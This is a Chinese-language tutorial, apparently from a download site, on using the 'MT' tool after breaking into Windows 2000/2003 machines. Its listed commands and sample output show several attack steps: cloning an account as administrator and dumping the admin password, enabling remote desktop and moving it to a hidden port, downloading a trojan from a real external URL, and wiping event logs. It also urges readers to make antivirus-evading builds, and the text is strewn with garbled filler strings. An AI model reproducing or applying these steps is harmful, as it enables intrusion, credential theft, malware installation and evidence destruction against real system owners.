MT详解教程

软件简介：
+ C7 P! J+ K, {6 l0 T2 t 今天来讲一下MT的详细用法,MT只有40几K,担功能却是非常强大的.很多时候在入
侵时用款小工具能帮忙我们解决很多问题...现在就来详细的讲解一下mt具体应
用..
+ N) I  \0 E& b0 X1 Z# w) K( s1.mt -sysinfo 查看机器配置
6 V# q/ c/ E& T1 R+ k, o+ T先来看一下..看到没??这里就会列举出来本机的各种配置信息....看下面.这里面列举了现在系统打过的补丁,这里显示了本机硬件的配置..CPU等..这里显示了本机IP地址,子网,和网关...
2.type c:\boot.in 查看启动文件
这主要是调 用了c:\boot.i 这个文件,就是开机的双启动菜单,通过它来查看本机用的是什么系统.这里多说一个.. VER功能和它也是一样的.它是系统命令..
% a4 o  V, P' Q9 f0 X0 V[boot loader]
8 J) a& }- m7 d2 T, Jtimeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
$ y- H( i8 o- ~5 u* p' L5 Q; l[operating systems]
* U2 P% o6 J) L; hmulti(0)disk(0)rdisk(0)partition(1)\WINNT=Microsoft Windows 2000 Server /fastd
9 B% q2 ?$ X; detect
) q' g* K* C, u/ z% E$ r! CC:\ver
& m- |. Y6 l% w5 `5 M8 SMicrosoft Windows 2000 [Version 5.00.2195]
看到了吧?2000的系统..
# t9 c% d  P5 T! J* ]( I& D3.mt -clone Administrator guest 意思是把guest克隆为管理员（必需是系统权
6 |* @3 @$ C% e9 @- W3 l限才能运行）

+ V) t! d7 O) t4.mt -chkuser 查看自己机器里是否有克隆的帐户
. I* O7 Y6 R" G+ S# _用它也可以来查看自己的机器是否被人克隆了帐户..
, a3 O. p3 ~: T1 a7 T# q( l$ G看到了吧..
* N+ l. h; e3 [' _
# w+ w' v$ F+ g+ ~& |( F4 a7 v5.mt -findpass 查看管理员密码（仅2000/2003）
+ C$ `+ F. v7 C# D这个功能和一个findpass的功能是一样的.

C:\mt -findpass
The logon information :
1 ?" }$ @  h; E/ C. X, \* l Domain : 77AFCF2E775047B
Username : Administrator
8 @8 ~$ Z7 _# U Password : 123
看到了吧?我系统的密码就是123
& V, C; m$ a+ I5 b+ M7 ^5 i4 [6.mt -pslist 查看进程
$ P0 x7 s- ?! m( Z6 b9 h4 O2 o. \此功能是在DOS下显示主机现在正在运行的程序.如果是在XP下
, h- `, `3 I& e6 {0 {5 L我们就可以直接用tasklist 就可以了...担在2000下不技术
就这样子..看到了吧?
+ W5 Y- R( p4 m( X4 ~  W4 b再试个..
  L5 L! S" [9 j' Y" N+ o* w关它..
% {! h' J6 L/ `7.mt -pskill 杀除进程
些功能就是杀掉某个进程,这里我们可以试一下.
. A' A. [* J2 n" w% V/ t" M现在我们来关掉932这个进程..
7 {: N' D" J3 A, Z$ M( S8 f' rC:\mt -pskill 772
Kill process sccuessful!
已经关掉了..
1 ?- E/ g' H$ q( j8.mt -setupts 安装终端服务（仅2000/2003好用）
$ E2 |7 U4 [# J这里说明下,我们平时我们在入侵2000的机器时有时开不了3389,那是因为只有2000服务器版的系统才能开3389,如果不是服务器版的,是开不了3389的,这也是有很多人不问为什么就一直开3389而打不开的原因..
我虚拟机不是服务器的,所以打不开..就是这意思..
9.mt -chgtsp 1030 改终端端口
6 [) f0 H$ E" r0 o& I6 R( ?当我们开了对方机子3389后,主人很容易会发现开放,那我们可以把3389的端口给改这样只有我们自己去用它...
2 F+ O8 V- k- h8 D: S/ d1030 这个改成你想要的端口..
10.mt -reboot 重启
不带有任何提示,直接重启....一会我试下..
11.mt -netget http://或者ftp://www.你木马的地址 c:\1.exe 下载木马
6 |! ?0 [+ ?) h8 X0 a$ K% P$ x) j# O$ u功能和vget是一样的,我们来试下..
Fail to open registy key...
- d. t9 @) i; n/ t" Y9 dC:\mt -netget http://user.free2.77169.net/didiaoyin/mm.exe c:\mm.exe
( H8 K+ i+ K: GDownload File from http://user.free2.77169.net/didiaoyin/mm.exe to c:\
Download completed 290817 bytes ......
Downloaded 284.0KB @94.7KB/S in 2sec.
- s- n- F( X2 q8 |# ^2 sFile c:\mm.exe TotalByte : 284 KB.
; V; x7 `& M( G+ J  o' {看到了吧?现在来看一下..我的鸽子...
% Z  b* n7 ^8 T9 m. Z$ m12.mt -clog all 删除所有应用程序，系统，日志等
2 O/ x3 C- n7 p  w8 @这个都明白吧...
/ _, P3 ?0 w, e% Y2 wC:\mt -clog all
Clean EventLog : Application successful!
Clean EventLog : Security successful!
7 o. u8 j6 d! F# m5 h9 ~3 }Clean EventLog : System successful!
1 N0 x/ W6 |4 x9 }+ e0 J这样就把日志都删除了...
' i# I. T& k) U13.mt -dlllist 列出进程DLL
! W3 M4 @. V! q% L0 |格式是mt -dlllist 进程号
) d4 M1 |( P/ N, X" B, s: `9 R$ X这样就可以把对应进程号的进程显示出所有的DLL文件
这个在我们查马时很有用..
$ m9 J# D, l7 l( F) B此功能目的是列出进程的DLL文件,我们来看下..
& M+ U7 A4 A5 U7 B8 W  v/ C! |14.mt -poweroff 关掉电源。
没什么好说的,直接关机..
15.mt -logoff 注销
直接注销.
  P) Q- e4 |3 U* s) q16.mt -shutdown 关机(都不会有任何提示)
7 y8 B  `$ w3 s+ K/ x$ W$ J( U( ]关机..
17.mt -chkts 检查终端信息
没有.
5 V) |: {* {# ]' H) j18.mt -remts 卸载终端服务
这个就和刚才的那个8.mt -setupts 是对应的,卸载终端...
  d( [  t# c! P2 h5 q) E, Y  W- ahttp://user.free2.77169.net/didiaoyin/mm.exe
0 _" i% Q3 f& A: Z, S8 b$ C* S* m# x. n
好了,MT的基本用法就这么多,功能还是很多的...担是现在杀软都杀它..我们要自己做免杀...
# Q* G- X  S3 @. D9 _1 x7 }现在来试下mt -logoff 这个吧,注销,看下效果..关机也是一样的..
看到了吧?不会有任何提示,直接关...
好了,今天教程就到这里了..
再见...
9 _( _* L( \! l下载地址：

2008-8-18 16:50 上传 MT详解教程.rar

下载权限:

版本vip会员

本地下载 检测资源   提取码: 需要终身vip或更高权限

有些游戏资源需要vip下载开通请点击开通vip